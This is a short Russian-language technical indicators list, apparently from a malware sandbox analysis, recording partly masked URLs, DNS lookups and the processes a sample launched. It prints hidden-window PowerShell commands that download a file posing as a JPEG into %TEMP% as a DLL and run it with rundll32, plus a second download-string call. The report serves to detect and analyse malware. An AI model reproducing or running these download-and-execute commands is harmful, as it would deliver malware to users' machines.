Техническая информация
- http://www.lo######a2016.xpg.com.br/site/img001.jpg как %temp%\vuaojsakskbo_user_iyyvb.dll
- http://bi#.ly/1qeb1tz
- http://bi#.ly/1Qeb1tz
- http://www.go###e.com.br/09122015.aspx
- DNS ASK bi#.ly
- DNS ASK lo######a2016.xpg.com.br
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-obJEct systEM.nEt.wEbcliEnt).downloadfilE('""http://www.lo######a2016.xpg.com.br/site/img001.jpg','%TEMP%\vuaojsakskbo_user_iyyvb.dll');start-procEss rundll32.ExE %TEMP%\vuaojsakskbo_user_...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-obJEct nEt.wEbcliEnt).downloadstring('http://bi#.ly/1Qeb1tz')"' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %TEMP%\vuaojsakskbo_user_iyyvb.dll dlgProc